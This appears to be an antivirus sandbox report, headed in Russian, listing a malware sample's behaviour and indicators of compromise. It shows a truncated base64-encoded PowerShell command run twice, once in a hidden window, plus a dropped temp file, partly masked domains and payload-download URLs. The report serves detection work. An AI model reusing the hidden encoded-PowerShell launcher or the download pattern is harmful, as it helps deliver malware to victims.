Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAEQARABHAHcAQQBHAEQAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdQBvACcALAAnAFoAVQBVAEEARwBfACcAKQA7ACQAYgBBAEQAQQBVAEEAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgACgAJwBOAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\1282031.cvr
- 'ho###ath.com':80
- 'ho###ath.com':443
- 'ma###ai.com.br':80
- 'ma###ai.com.br':443
- http://ho###ath.com/wp-includes/5_Z/
- http://ma###ai.com.br/site/kX_z/
- 'ho###ath.com':443
- 'ma###ai.com.br':443
- DNS ASK ho###ath.com
- DNS ASK ma####iaonline.tk
- DNS ASK gi###overs.shop
- DNS ASK ma###ai.com.br
- DNS ASK ic####backup.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAEQARABHAHcAQQBHAEQAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdQBvACcALAAnAFoAVQBVAEEARwBfACcAKQA7ACQAYgBBAEQAQQBVAEEAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgACgAJwBOAG...' (со скрытым окном)